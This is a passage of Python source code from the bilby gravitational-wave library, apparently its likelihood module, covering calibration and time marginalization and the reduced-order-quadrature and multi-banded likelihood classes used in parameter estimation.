"The _bessel_function_interped method is deprecated and will be removed, "
"please update the implementation of phase marginalization "
"to use bilby.gw.utils.ln_i0"
)
return ln_i0(xx) + xx
def _setup_time_marginalization(self):
self._delta_tc = 2 / self.waveform_generator.sampling_frequency
self._times =\
self.interferometers.start_time + np.linspace(
0, self.interferometers.duration,
int(self.interferometers.duration / 2 *
self.waveform_generator.sampling_frequency + 1))[1:]
self.time_prior_array = \
self.priors['geocent_time'].prob(self._times) * self._delta_tc
def _setup_calibration_marginalization(self, calibration_lookup_table):
if calibration_lookup_table is None:
calibration_lookup_table = {}
self.calibration_draws = {}
self.calibration_abs_draws = {}
self.calibration_parameter_draws = {}
for interferometer in self.interferometers:
# Force the priors
calibration_priors = PriorDict()
for key in self.priors.keys():
if 'recalib' in key and interferometer.name in key:
calibration_priors[key] = copy.copy(self.priors[key])
self.priors[key] = DeltaFunction(0.0)
# If there is no entry in the lookup table, make an empty one
if interferometer.name not in calibration_lookup_table.keys():
calibration_lookup_table[interferometer.name] =\
f'{interferometer.name}_calibration_file.h5'
# If the interferometer lookup table file exists, generate the curves from it
if os.path.exists(calibration_lookup_table[interferometer.name]):
self.calibration_draws[interferometer.name] =\
calibration.read_calibration_file(
calibration_lookup_table[interferometer.name], self.interferometers.frequency_array,
self.number_of_response_curves, self.starting_index)
else: # generate the fake curves
from tqdm.auto import tqdm
self.calibration_parameter_draws[interferometer.name] =\
pd.DataFrame(calibration_priors.sample(self.number_of_response_curves))
self.calibration_draws[interferometer.name] = \
np.zeros((self.number_of_response_curves, len(interferometer.frequency_array)), dtype=complex)
for i in tqdm(range(self.number_of_response_curves)):
self.calibration_draws[interferometer.name][i, :] =\
interferometer.calibration_model.get_calibration_factor(
interferometer.frequency_array,
prefix='recalib_{}_'.format(interferometer.name),
**self.calibration_parameter_draws[interferometer.name].iloc[i])
calibration.write_calibration_file(
calibration_lookup_table[interferometer.name],
self.interferometers.frequency_array,
self.calibration_draws[interferometer.name],
self.calibration_parameter_draws[interferometer.name])
interferometer.calibration_model = calibration.Recalibrate()
_mask = interferometer.frequency_mask
self.calibration_draws[interferometer.name] = self.calibration_draws[interferometer.name][:, _mask]
self.calibration_abs_draws[interferometer.name] =\
np.abs(self.calibration_draws[interferometer.name])**2
@property
def interferometers(self):
return self._interferometers
@interferometers.setter
def interferometers(self, interferometers):
self._interferometers = InterferometerList(interferometers)
def _rescale_signal(self, signal, new_distance):
for mode in signal:
signal[mode] *= self._ref_dist / new_distance
@property
def reference_frame(self):
return self._reference_frame
@property
def _reference_frame_str(self):
if isinstance(self.reference_frame, str):
return self.reference_frame
else:
return "".join([ifo.name for ifo in self.reference_frame])
@reference_frame.setter
def reference_frame(self, frame):
if frame == "sky":
self._reference_frame = frame
elif isinstance(frame, InterferometerList):
self._reference_frame = frame[:2]
elif isinstance(frame, list):
self._reference_frame = InterferometerList(frame[:2])
elif isinstance(frame, str):
self._reference_frame = InterferometerList([frame[:2], frame[2:4]])
else:
raise ValueError("Unable to parse reference frame {}".format(frame))
def get_sky_frame_parameters(self):
time = self.parameters['{}_time'.format(self.time_reference)]
if not self.reference_frame == "sky":
ra, dec = zenith_azimuth_to_ra_dec(
self.parameters['zenith'], self.parameters['azimuth'],
time, self.reference_frame)
else:
ra = self.parameters["ra"]
dec = self.parameters["dec"]
if "geocent" not in self.time_reference:
geocent_time = (
time - self.reference_ifo.time_delay_from_geocenter(
ra=ra, dec=dec, time=time
)
)
else:
geocent_time = self.parameters["geocent_time"]
return dict(ra=ra, dec=dec, geocent_time=geocent_time)
@property
def lal_version(self):
try:
from lal import git_version, __version__
lal_version = str(__version__)
logger.info("Using lal version {}".format(lal_version))
lal_git_version = str(git_version.verbose_msg).replace("\n", ";")
logger.info("Using lal git version {}".format(lal_git_version))
return "lal_version={}, lal_git_version={}".format(lal_version, lal_git_version)
except (ImportError, AttributeError):
return "N/A"
@property
def lalsimulation_version(self):
try:
from lalsimulation import git_version, __version__
lalsim_version = str(__version__)
logger.info("Using lalsimulation version {}".format(lalsim_version))
lalsim_git_version = str(git_version.verbose_msg).replace("\n", ";")
logger.info("Using lalsimulation git version {}".format(lalsim_git_version))
return "lalsimulation_version={}, lalsimulation_git_version={}".format(lalsim_version, lalsim_git_version)
except (ImportError, AttributeError):
return "N/A"
@property
def meta_data(self):
return dict(
interferometers=self.interferometers.meta_data,
time_marginalization=self.time_marginalization,
phase_marginalization=self.phase_marginalization,
distance_marginalization=self.distance_marginalization,
calibration_marginalization=self.calibration_marginalization,
waveform_generator_class=self.waveform_generator.__class__,
waveform_arguments=self.waveform_generator.waveform_arguments,
frequency_domain_source_model=self.waveform_generator.frequency_domain_source_model,
parameter_conversion=self.waveform_generator.parameter_conversion,
sampling_frequency=self.waveform_generator.sampling_frequency,
duration=self.waveform_generator.duration,
start_time=self.waveform_generator.start_time,
time_reference=self.time_reference,
reference_frame=self._reference_frame_str,
lal_version=self.lal_version,
lalsimulation_version=self.lalsimulation_version)
class BasicGravitationalWaveTransient(Likelihood):
def __init__(self, interferometers, waveform_generator):
"""
A likelihood object, able to compute the likelihood of the data given
some model parameters
The simplest frequency-domain gravitational wave transient likelihood. Does
not include distance/phase marginalization.
Parameters
==========
interferometers: list
A list of `bilby.gw.detector.Interferometer` instances - contains the
detector data and power spectral densities
waveform_generator: bilby.gw.waveform_generator.WaveformGenerator
An object which computes the frequency-domain strain of the signal,
given some set of parameters
"""
super(BasicGravitationalWaveTransient, self).__init__(dict())
self.interferometers = interferometers
self.waveform_generator = waveform_generator
def __repr__(self):
return self.__class__.__name__ + '(interferometers={},\n\twaveform_generator={})'\
.format(self.interferometers, self.waveform_generator)
def noise_log_likelihood(self):
""" Calculates the real part of noise log-likelihood
Returns
=======
float: The real part of the noise log likelihood
"""
log_l = 0
for interferometer in self.interferometers:
log_l -= 2. / self.waveform_generator.duration * np.sum(
abs(interferometer.frequency_domain_strain) ** 2 /
interferometer.power_spectral_density_array)
return log_l.real
def log_likelihood(self):
""" Calculates the real part of log-likelihood value
Returns
=======
float: The real part of the log likelihood
"""
log_l = 0
waveform_polarizations =\
self.waveform_generator.frequency_domain_strain(
self.parameters.copy())
if waveform_polarizations is None:
return np.nan_to_num(-np.inf)
for interferometer in self.interferometers:
log_l += self.log_likelihood_interferometer(
waveform_polarizations, interferometer)
return log_l.real
def log_likelihood_interferometer(self, waveform_polarizations,
interferometer):
"""
Parameters
==========
waveform_polarizations: dict
Dictionary containing the desired waveform polarization modes and the related strain
interferometer: bilby.gw.detector.Interferometer
The Interferometer object we want to have the log-likelihood for
Returns
=======
float: The real part of the log-likelihood for this interferometer
"""
signal_ifo = interferometer.get_detector_response(
waveform_polarizations, self.parameters)
log_l = - 2. / self.waveform_generator.duration * np.vdot(
interferometer.frequency_domain_strain - signal_ifo,
(interferometer.frequency_domain_strain - signal_ifo) /
interferometer.power_spectral_density_array)
return log_l.real
class ROQGravitationalWaveTransient(GravitationalWaveTransient):
"""A reduced order quadrature likelihood object
This uses the method described in Smith et al., (2016) Phys. Rev. D 94,
044031. A public repository of the ROQ data is available from
https://git.ligo.org/lscsoft/ROQ_data.
Parameters
==========
interferometers: list, bilby.gw.detector.InterferometerList
A list of `bilby.detector.Interferometer` instances - contains the
detector data and power spectral densities
waveform_generator: `bilby.waveform_generator.WaveformGenerator`
An object which computes the frequency-domain strain of the signal,
given some set of parameters
linear_matrix: str, array_like
Either a string point to the file from which to load the linear_matrix
array, or the array itself.
quadratic_matrix: str, array_like
Either a string point to the file from which to load the
quadratic_matrix array, or the array itself.
roq_params: str, array_like
Parameters describing the domain of validity of the ROQ basis.
roq_params_check: bool
If true, run tests using the roq_params to check the prior and data are
valid for the ROQ
roq_scale_factor: float
The ROQ scale factor used.
priors: dict, bilby.prior.PriorDict
A dictionary of priors containing at least the geocent_time prior
Warning: when using marginalisation the dict is overwritten which will change the
the dict you are passing in. If this behaviour is undesired, pass `priors.copy()`.
distance_marginalization_lookup_table: (dict, str), optional
If a dict, dictionary containing the lookup_table, distance_array,
(distance) prior_array, and reference_distance used to construct
the table.
If a string the name of a file containing these quantities.
The lookup table is stored after construction in either the
provided string or a default location:
'.distance_marginalization_lookup_dmin{}_dmax{}_n{}.npz'
reference_frame: (str, bilby.gw.detector.InterferometerList, list), optional
Definition of the reference frame for the sky location.
- "sky": sample in RA/dec, this is the default
- e.g., "H1L1", ["H1", "L1"], InterferometerList(["H1", "L1"]):
sample in azimuth and zenith, `azimuth` and `zenith` defined in the
frame where the z-axis is aligned the the vector connecting H1
and L1.
time_reference: str, optional
Name of the reference for the sampled time parameter.
- "geocent"/"geocenter": sample in the time at the Earth's center,
this is the default
- e.g., "H1": sample in the time of arrival at H1
"""
def __init__(
self, interferometers, waveform_generator, priors,
weights=None, linear_matrix=None, quadratic_matrix=None,
roq_params=None, roq_params_check=True, roq_scale_factor=1,
distance_marginalization=False, phase_marginalization=False,
distance_marginalization_lookup_table=None,
reference_frame="sky", time_reference="geocenter"
):
super(ROQGravitationalWaveTransient, self).__init__(
interferometers=interferometers,
waveform_generator=waveform_generator, priors=priors,
distance_marginalization=distance_marginalization,
phase_marginalization=phase_marginalization,
time_marginalization=False,
distance_marginalization_lookup_table=distance_marginalization_lookup_table,
jitter_time=False,
reference_frame=reference_frame,
time_reference=time_reference
)
self.roq_params_check = roq_params_check
self.roq_scale_factor = roq_scale_factor
if isinstance(roq_params, np.ndarray) or roq_params is None:
self.roq_params = roq_params
elif isinstance(roq_params, str):
self.roq_params_file = roq_params
self.roq_params = np.genfromtxt(roq_params, names=True)
else:
raise TypeError("roq_params should be array or str")
if isinstance(weights, dict):
self.weights = weights
elif isinstance(weights, str):
self.weights = self.load_weights(weights)
else:
self.weights = dict()
if isinstance(linear_matrix, str):
logger.info(
"Loading linear matrix from {}".format(linear_matrix))
linear_matrix = np.load(linear_matrix).T
if isinstance(quadratic_matrix, str):
logger.info(
"Loading quadratic_matrix from {}".format(quadratic_matrix))
quadratic_matrix = np.load(quadratic_matrix).T
self._set_weights(linear_matrix=linear_matrix,
quadratic_matrix=quadratic_matrix)
self.frequency_nodes_linear =\
waveform_generator.waveform_arguments['frequency_nodes_linear']
self.frequency_nodes_quadratic = \
waveform_generator.waveform_arguments['frequency_nodes_quadratic']
def calculate_snrs(self, waveform_polarizations, interferometer):
"""
Compute the snrs for ROQ
Parameters
==========
waveform_polarizations: waveform
interferometer: bilby.gw.detector.Interferometer
"""
f_plus = interferometer.antenna_response(
self.parameters['ra'], self.parameters['dec'],
self.parameters['geocent_time'], self.parameters['psi'], 'plus')
f_cross = interferometer.antenna_response(
self.parameters['ra'], self.parameters['dec'],
self.parameters['geocent_time'], self.parameters['psi'], 'cross')
dt = interferometer.time_delay_from_geocenter(
self.parameters['ra'], self.parameters['dec'],
self.parameters['geocent_time'])
dt_geocent = self.parameters['geocent_time'] - interferometer.strain_data.start_time
ifo_time = dt_geocent + dt
calib_linear = interferometer.calibration_model.get_calibration_factor(
self.frequency_nodes_linear,
prefix='recalib_{}_'.format(interferometer.name), **self.parameters)
calib_quadratic = interferometer.calibration_model.get_calibration_factor(
self.frequency_nodes_quadratic,
prefix='recalib_{}_'.format(interferometer.name), **self.parameters)
h_plus_linear = f_plus * waveform_polarizations['linear']['plus'] * calib_linear
h_cross_linear = f_cross * waveform_polarizations['linear']['cross'] * calib_linear
h_plus_quadratic = (
f_plus * waveform_polarizations['quadratic']['plus'] * calib_quadratic)
h_cross_quadratic = (
f_cross * waveform_polarizations['quadratic']['cross'] * calib_quadratic)
indices, in_bounds = self._closest_time_indices(
ifo_time, self.weights['time_samples'])
if not in_bounds:
logger.debug("SNR calculation error: requested time at edge of ROQ time samples")
return self._CalculatedSNRs(
d_inner_h=np.nan_to_num(-np.inf), optimal_snr_squared=0,
complex_matched_filter_snr=np.nan_to_num(-np.inf),
d_inner_h_squared_tc_array=None,
d_inner_h_array=None,
optimal_snr_squared_array=None)
d_inner_h_tc_array = np.einsum(
'i,ji->j', np.conjugate(h_plus_linear + h_cross_linear),
self.weights[interferometer.name + '_linear'][indices])
d_inner_h = self._interp_five_samples(
self.weights['time_samples'][indices], d_inner_h_tc_array, ifo_time)
optimal_snr_squared = \
np.vdot(np.abs(h_plus_quadratic + h_cross_quadratic)**2,
self.weights[interferometer.name + '_quadratic'])
with np.errstate(invalid="ignore"):
complex_matched_filter_snr = d_inner_h / (optimal_snr_squared**0.5)
d_inner_h_squared_tc_array = None
return self._CalculatedSNRs(
d_inner_h=d_inner_h, optimal_snr_squared=optimal_snr_squared,
complex_matched_filter_snr=complex_matched_filter_snr,
d_inner_h_squared_tc_array=d_inner_h_squared_tc_array,
d_inner_h_array=None,
optimal_snr_squared_array=None)
@staticmethod
def _closest_time_indices(time, samples):
"""
Get the closest five times
Parameters
==========
time: float
Time to check
samples: array-like
Available times
Returns
=======
indices: list
Indices nearest to time
in_bounds: bool
Whether the indices are for valid times
"""
closest = int((time - samples[0]) / (samples[1] - samples[0]))
indices = [closest + ii for ii in [-2, -1, 0, 1, 2]]
in_bounds = (indices[0] >= 0) & (indices[-1] < samples.size)
return indices, in_bounds
@staticmethod
def _interp_five_samples(time_samples, values, time):
"""
Interpolate a function of time with its values at the closest five times.
The algorithm is explained in https://dcc.ligo.org/T2100224.
Parameters
==========
time_samples: array-like
Closest 5 times
values: array-like
The values of the function at closest 5 times
time: float
Time at which the function is calculated
Returns
=======
value: float
The value of the function at the input time
"""
r1 = (-values[0] + 8. * values[1] - 14. * values[2] + 8. * values[3] - values[4]) / 4.
r2 = values[2] - 2. * values[3] + values[4]
a = (time_samples[3] - time) / (time_samples[1] - time_samples[0])
b = 1. - a
c = (a**3. - a) / 6.
d = (b**3. - b) / 6.
return a * values[2] + b * values[3] + c * r1 + d * r2
def perform_roq_params_check(self, ifo=None):
""" Perform checking that the prior and data are valid for the ROQ
Parameters
==========
ifo: bilby.gw.detector.Interferometer
The interferometer
"""
if self.roq_params_check is False:
logger.warning("No ROQ params checking performed")
return
else:
if getattr(self, "roq_params_file", None) is not None:
msg = ("Check ROQ params {} with roq_scale_factor={}"
.format(self.roq_params_file, self.roq_scale_factor))
else:
msg = ("Check ROQ params with roq_scale_factor={}"
.format(self.roq_scale_factor))
logger.info(msg)
roq_params = self.roq_params
roq_minimum_frequency = roq_params['flow'] * self.roq_scale_factor
roq_maximum_frequency = roq_params['fhigh'] * self.roq_scale_factor
roq_segment_length = roq_params['seglen'] / self.roq_scale_factor
roq_minimum_chirp_mass = roq_params['chirpmassmin'] / self.roq_scale_factor
roq_maximum_chirp_mass = roq_params['chirpmassmax'] / self.roq_scale_factor
roq_minimum_component_mass = roq_params['compmin'] / self.roq_scale_factor
if ifo.maximum_frequency > roq_maximum_frequency:
raise BilbyROQParamsRangeError(
"Requested maximum frequency {} larger than ROQ basis fhigh {}"
.format(ifo.maximum_frequency, roq_maximum_frequency))
if ifo.minimum_frequency < roq_minimum_frequency:
raise BilbyROQParamsRangeError(
"Requested minimum frequency {} lower than ROQ basis flow {}"
.format(ifo.minimum_frequency, roq_minimum_frequency))
if ifo.strain_data.duration != roq_segment_length:
raise BilbyROQParamsRangeError(
"Requested duration differs from ROQ basis seglen")
priors = self.priors
if isinstance(priors, CBCPriorDict) is False:
logger.warning("Unable to check ROQ parameter bounds: priors not understood")
return
if priors.minimum_chirp_mass is None:
logger.warning("Unable to check minimum chirp mass ROQ bounds")
elif priors.minimum_chirp_mass < roq_minimum_chirp_mass:
raise BilbyROQParamsRangeError(
"Prior minimum chirp mass {} less than ROQ basis bound {}"
.format(priors.minimum_chirp_mass,
roq_minimum_chirp_mass))
if priors.maximum_chirp_mass is None:
logger.warning("Unable to check maximum_chirp mass ROQ bounds")
elif priors.maximum_chirp_mass > roq_maximum_chirp_mass:
raise BilbyROQParamsRangeError(
"Prior maximum chirp mass {} greater than ROQ basis bound {}"
.format(priors.maximum_chirp_mass,
roq_maximum_chirp_mass))
if priors.minimum_component_mass is None:
logger.warning("Unable to check minimum component mass ROQ bounds")
elif priors.minimum_component_mass < roq_minimum_component_mass:
raise BilbyROQParamsRangeError(
"Prior minimum component mass {} less than ROQ basis bound {}"
.format(priors.minimum_component_mass,
roq_minimum_component_mass))
def _set_weights(self, linear_matrix, quadratic_matrix):
"""
Setup the time-dependent ROQ weights.
See https://dcc.ligo.org/LIGO-T2100125 for the detail of how to compute them.
Parameters
==========
linear_matrix, quadratic_matrix: array_like
Arrays of the linear and quadratic basis
"""
time_space = self._get_time_resolution()
number_of_time_samples = int(self.interferometers.duration / time_space)
try:
import pyfftw
ifft_input = pyfftw.empty_aligned(number_of_time_samples, dtype=complex)
ifft_output = pyfftw.empty_aligned(number_of_time_samples, dtype=complex)
ifft = pyfftw.FFTW(ifft_input, ifft_output, direction='FFTW_BACKWARD')
except ImportError:
pyfftw = None
logger.warning("You do not have pyfftw installed, falling back to numpy.fft.")
ifft_input = np.zeros(number_of_time_samples, dtype=complex)
ifft = np.fft.ifft
earth_light_crossing_time = 2 * radius_of_earth / speed_of_light + 5 * time_space
start_idx = max(0, int(np.floor((self.priors['{}_time'.format(self.time_reference)].minimum -
earth_light_crossing_time - self.interferometers.start_time) / time_space)))
end_idx = min(number_of_time_samples - 1, int(np.ceil((
self.priors['{}_time'.format(self.time_reference)].maximum + earth_light_crossing_time -
self.interferometers.start_time) / time_space)))
self.weights['time_samples'] = np.arange(start_idx, end_idx + 1) * time_space
logger.info("Using {} ROQ time samples".format(len(self.weights['time_samples'])))
for ifo in self.interferometers:
if self.roq_params is not None:
self.perform_roq_params_check(ifo)
# Get scaled ROQ quantities
roq_scaled_minimum_frequency = self.roq_params['flow'] * self.roq_scale_factor
roq_scaled_maximum_frequency = self.roq_params['fhigh'] * self.roq_scale_factor
roq_scaled_segment_length = self.roq_params['seglen'] / self.roq_scale_factor
# Generate frequencies for the ROQ
roq_frequencies = create_frequency_series(
sampling_frequency=roq_scaled_maximum_frequency * 2,
duration=roq_scaled_segment_length)
roq_mask = roq_frequencies >= roq_scaled_minimum_frequency
roq_frequencies = roq_frequencies[roq_mask]
overlap_frequencies, ifo_idxs, roq_idxs = np.intersect1d(
ifo.frequency_array[ifo.frequency_mask], roq_frequencies,
return_indices=True)
else:
overlap_frequencies = ifo.frequency_array[ifo.frequency_mask]
roq_idxs = np.arange(linear_matrix.shape[0], dtype=int)
ifo_idxs = np.arange(sum(ifo.frequency_mask))
if len(ifo_idxs) != len(roq_idxs):
raise ValueError(
"Mismatch between ROQ basis and frequency array for "
"{}".format(ifo.name))
logger.info(
"Building ROQ weights for {} with {} frequencies between {} "
"and {}.".format(
ifo.name, len(overlap_frequencies),
min(overlap_frequencies), max(overlap_frequencies)))
ifft_input[:] *= 0.
self.weights[ifo.name + '_linear'] = \
np.zeros((len(self.weights['time_samples']), linear_matrix.shape[1]), dtype=complex)
data_over_psd = ifo.frequency_domain_strain[ifo.frequency_mask][ifo_idxs] / \
ifo.power_spectral_density_array[ifo.frequency_mask][ifo_idxs]
nonzero_idxs = ifo_idxs + int(ifo.frequency_array[ifo.frequency_mask][0] * self.interferometers.duration)
for i, basis_element in enumerate(linear_matrix[roq_idxs].T):
ifft_input[nonzero_idxs] = data_over_psd * np.conj(basis_element)
self.weights[ifo.name + '_linear'][:, i] = ifft(ifft_input)[start_idx:end_idx + 1]
self.weights[ifo.name + '_linear'] *= 4. * number_of_time_samples / self.interferometers.duration
self.weights[ifo.name + '_quadratic'] = build_roq_weights(
1 /
ifo.power_spectral_density_array[ifo.frequency_mask][ifo_idxs],
quadratic_matrix[roq_idxs].real,
1 / ifo.strain_data.duration)
logger.info("Finished building weights for {}".format(ifo.name))
if pyfftw is not None:
pyfftw.forget_wisdom()
def save_weights(self, filename, format='npz'):
if format not in filename:
filename += "." + format
logger.info("Saving ROQ weights to {}".format(filename))
if format == 'json':
with open(filename, 'w') as file:
json.dump(self.weights, file, indent=2, cls=BilbyJsonEncoder)
elif format == 'npz':
np.savez(filename, **self.weights)
@staticmethod
def load_weights(filename, format=None):
if format is None:
format = filename.split(".")[-1]
if format not in ["json", "npz"]:
raise IOError("Format {} not recognized.".format(format))
logger.info("Loading ROQ weights from {}".format(filename))
if format == "json":
with open(filename, 'r') as file:
weights = json.load(file, object_hook=decode_bilby_json)
elif format == "npz":
# Wrap in dict to load data into memory
weights = dict(np.load(filename))
return weights
def _get_time_resolution(self):
"""
This method estimates the time resolution given the optimal SNR of the
signal in the detector. This is then used when constructing the weights
for the ROQ.
A minimum resolution is set by assuming the SNR in each detector is at
least 10. When the SNR is not available the SNR is assumed to be 30 in
each detector.
Returns
=======
delta_t: float
Time resolution
"""
def calc_fhigh(freq, psd, scaling=20.):
"""
Parameters
==========
freq: array-like
Frequency array
psd: array-like
Power spectral density
scaling: float
SNR dependent scaling factor
Returns
=======
f_high: float
The maximum frequency which must be considered
"""
from scipy.integrate import simps
integrand1 = np.power(freq, -7. / 3) / psd
integral1 = simps(integrand1, freq)
integrand3 = np.power(freq, 2. / 3.) / (psd * integral1)
f_3_bar = simps(integrand3, freq)
f_high = scaling * f_3_bar**(1 / 3)
return f_high
def c_f_scaling(snr):
return (np.pi**2 * snr**2 / 6)**(1 / 3)
inj_snr_sq = 0
for ifo in self.interferometers:
inj_snr_sq += max(10, ifo.meta_data.get('optimal_SNR', 30))**2
psd = ifo.power_spectral_density_array[ifo.frequency_mask]
freq = ifo.frequency_array[ifo.frequency_mask]
fhigh = calc_fhigh(freq, psd, scaling=c_f_scaling(inj_snr_sq**0.5))
delta_t = fhigh**-1
# Apply a safety factor to ensure the time step is short enough
delta_t = delta_t / 5
# duration / delta_t needs to be a power of 2 for IFFT
number_of_time_samples = max(
self.interferometers.duration / delta_t,
self.interferometers.frequency_array[-1] * self.interferometers.duration + 1)
number_of_time_samples = int(2**np.ceil(np.log2(number_of_time_samples)))
delta_t = self.interferometers.duration / number_of_time_samples
logger.info("ROQ time-step = {}".format(delta_t))
return delta_t
def _rescale_signal(self, signal, new_distance):
for kind in ['linear', 'quadratic']:
for mode in signal[kind]:
signal[kind][mode] *= self._ref_dist / new_distance
def get_binary_black_hole_likelihood(interferometers):
""" A wrapper to quickly set up a likelihood for BBH parameter estimation
Parameters
==========
interferometers: {bilby.gw.detector.InterferometerList, list}
A list of `bilby.detector.Interferometer` instances, typically the
output of either `bilby.detector.get_interferometer_with_open_data`
or `bilby.detector.get_interferometer_with_fake_noise_and_injection`
Returns
=======
bilby.GravitationalWaveTransient: The likelihood to pass to `run_sampler`
"""
waveform_generator = WaveformGenerator(
duration=interferometers.duration,
sampling_frequency=interferometers.sampling_frequency,
frequency_domain_source_model=lal_binary_black_hole,
waveform_arguments={'waveform_approximant': 'IMRPhenomPv2',
'reference_frequency': 50})
return GravitationalWaveTransient(interferometers, waveform_generator)
class BilbyROQParamsRangeError(Exception):
pass
class MBGravitationalWaveTransient(GravitationalWaveTransient):
"""A multi-banded likelihood object
This uses the method described in <NAME>, 2021, arXiv: 2104.07813.
Parameters
----------
interferometers: list, bilby.gw.detector.InterferometerList
A list of `bilby.detector.Interferometer` instances - contains the detector data and power spectral densities
waveform_generator: `bilby.waveform_generator.WaveformGenerator`
An object which computes the frequency-domain strain of the signal, given some set of parameters
reference_chirp_mass: float
A reference chirp mass for determining the frequency banding
highest_mode: int, optional
The maximum magnetic number of gravitational-wave moments. Default is 2
linear_interpolation: bool, optional
If True, the linear-interpolation method is used for the computation of (h, h). If False, the IFFT-FFT method
is used. Default is True.
accuracy_factor: float, optional
A parameter to determine the accuracy of multi-banding. The larger this factor is, the more accurate the
approximation is. This corresponds to L in the paper. Default is 5.
time_offset: float, optional
(end time of data) - (maximum arrival time). If None, it is inferred from the prior of geocent time.
delta_f_end: float, optional
The frequency scale with which waveforms at the high-frequency end are smoothed. If None, it is determined from
the prior of geocent time.
maximum_banding_frequency: float, optional
A maximum frequency for multi-banding. If specified, the low-frequency limit of a band does not exceed it.
minimum_banding_duration: float, optional
A minimum duration for multi-banding. If specified, the duration of a band is not smaller than it.
distance_marginalization: bool, optional
If true, marginalize over distance in the likelihood. This uses a look up table calculated at run time. The
distance prior is set to be a delta function at the minimum distance allowed in the prior being marginalised
over.
phase_marginalization: bool, optional
If true, marginalize over phase in the likelihood. This is done analytically using a Bessel function. The phase
prior is set to be a delta function at phase=0.
priors: dict, bilby.prior.PriorDict
A dictionary of priors containing at least the geocent_time prior
distance_marginalization_lookup_table: (dict, str), optional
If a dict, dictionary containing the lookup_table, distance_array, (distance) prior_array, and
reference_distance used to construct the table. If a string the name of a file containing these quantities. The
lookup table is stored after construction in either the provided string or a default location:
'.distance_marginalization_lookup_dmin{}_dmax{}_n{}.npz'
reference_frame: (str, bilby.gw.detector.InterferometerList, list), optional
Definition of the reference frame for the sky location.
- "sky": sample in RA/dec, this is the default
- e.g., "H1L1", ["H1", "L1"], InterferometerList(["H1", "L1"]):
sample in azimuth and zenith, `azimuth` and `zenith` defined in the frame where the z-axis is aligned the the
vector connecting H1 and L1.
time_reference: str, optional
Name of the reference for the sampled time parameter.
- "geocent"/"geocenter": sample in the time at the Earth's center, this is the default
- e.g., "H1": sample in the time of arrival at H1
Returns
-------
Likelihood: `bilby.core.likelihood.Likelihood`
A likelihood object, able to compute the likelihood of the data given some model parameters
"""
def __init__(
self, interferometers, waveform_generator, reference_chirp_mass, highest_mode=2, linear_interpolation=True,
accuracy_factor=5, time_offset=None, delta_f_end=None, maximum_banding_frequency=None,
minimum_banding_duration=0., distance_marginalization=False, phase_marginalization=False, priors=None,
distance_marginalization_lookup_table=None, reference_frame="sky", time_reference="geocenter"
):
super(MBGravitationalWaveTransient, self).__init__(
interferometers=interferometers, waveform_generator=waveform_generator, priors=priors,
distance_marginalization=distance_marginalization, phase_marginalization=phase_marginalization,
time_marginalization=False, distance_marginalization_lookup_table=distance_marginalization_lookup_table,
jitter_time=False, reference_frame=reference_frame, time_reference=time_reference
)
self.reference_chirp_mass = reference_chirp_mass
self.highest_mode = highest_mode
self.linear_interpolation = linear_interpolation
self.accuracy_factor = accuracy_factor
self.time_offset = time_offset
self.delta_f_end = delta_f_end
self.minimum_frequency = np.min([i.minimum_frequency for i in self.interferometers])
self.maximum_frequency = np.max([i.maximum_frequency for i in self.interferometers])
self.maximum_banding_frequency = maximum_banding_frequency
self.minimum_banding_duration = minimum_banding_duration
self.setup_multibanding()
@property
def reference_chirp_mass(self):
return self._reference_chirp_mass
@property
def reference_chirp_mass_in_second(self):
return gravitational_constant * self._reference_chirp_mass * solar_mass / speed_of_light**3.
@reference_chirp_mass.setter
def reference_chirp_mass(self, reference_chirp_mass):
if isinstance(reference_chirp_mass, int) or isinstance(reference_chirp_mass, float):
self._reference_chirp_mass = reference_chirp_mass
else:
raise TypeError("reference_chirp_mass must be a number")
@property
def highest_mode(self):
return self._highest_mode
@highest_mode.setter
def highest_mode(self, highest_mode):
if isinstance(highest_mode, int) or isinstance(highest_mode, float):
self._highest_mode = highest_mode
else:
raise TypeError("highest_mode must be a number")
@property
def linear_interpolation(self):
return self._linear_interpolation
@linear_interpolation.setter
def linear_interpolation(self, linear_interpolation):
if isinstance(linear_interpolation, bool):
self._linear_interpolation = linear_interpolation
else:
raise TypeError("linear_interpolation must be a bool")
@property
def accuracy_factor(self):
return self._accuracy_factor
@accuracy_factor.setter
def accuracy_factor(self, accuracy_factor):
if isinstance(accuracy_factor, int) or isinstance(accuracy_factor, float):
self._accuracy_factor = accuracy_factor
else:
raise TypeError("accuracy_factor must be a number")
@property
def time_offset(self):
return self._time_offset
@time_offset.setter
def time_offset(self, time_offset):
"""
This sets the time offset assumed when frequency bands are constructed. The default value is (the
maximum offset of geocent time in the prior range) + (light-traveling time of the Earth). If the
prior does not contain 'geocent_time', 2.12 seconds is used. It is calculated assuming that the
maximum offset of geocent time is 2.1 seconds, which is the value for the standard prior used by
LIGO-Virgo-KAGRA.
"""
time_parameter = self.time_reference + "_time"
if time_parameter == "geocent_time":
safety = radius_of_earth / speed_of_light
else:
safety = 2 * radius_of_earth / speed_of_light
if time_offset is not None:
if isinstance(time_offset, int) or isinstance(time_offset, float):
self._time_offset = time_offset
else:
raise TypeError("time_offset must be a number")
elif self.priors is not None and time_parameter in self.priors:
self._time_offset = (
self.interferometers.start_time + self.interferometers.duration
- self.priors[time_parameter].minimum + safety
)
else:
self._time_offset = 2.12
logger.warning("time offset can not be inferred. Use the standard time offset of {} seconds.".format(
self._time_offset))
@property
def delta_f_end(self):
return self._delta_f_end
@delta_f_end.setter
def delta_f_end(self, delta_f_end):
"""
This sets the frequency scale of tapering the high-frequency end of waveform, to avoid the issues of
abrupt termination of waveform described in Sec. 2. F of arXiv: 2104.07813. This needs to be much
larger than the inverse of the minimum time offset, and the default value is 100 times of that. If
the prior does not contain 'geocent_time' and the minimum time offset can not be computed, 53Hz is
used. It is computed assuming that the minimum offset of geocent time is 1.9 seconds, which is the
value for the standard prior used by LIGO-Virgo-KAGRA.
"""
time_parameter = self.time_reference + "_time"
if time_parameter == "geocent_time":
safety = radius_of_earth / speed_of_light
else:
safety = 2 * radius_of_earth / speed_of_light
if delta_f_end is not None:
if isinstance(delta_f_end, int) or isinstance(delta_f_end, float):
self._delta_f_end = delta_f_end
else:
raise TypeError("delta_f_end must be a number")
elif self.priors is not None and time_parameter in self.priors:
self._delta_f_end = 100 / (
self.interferometers.start_time + self.interferometers.duration
- self.priors[time_parameter].maximum - safety
)
else:
self._delta_f_end = 53.
logger.warning("delta_f_end can not be inferred. Use the standard delta_f_end of {} Hz.".format(
self._delta_f_end))
@property
def maximum_banding_frequency(self):
return self._maximum_banding_frequency
@maximum_banding_frequency.setter
def maximum_banding_frequency(self, maximum_banding_frequency):
"""
This sets the upper limit on a starting frequency of a band. The default value is the frequency at
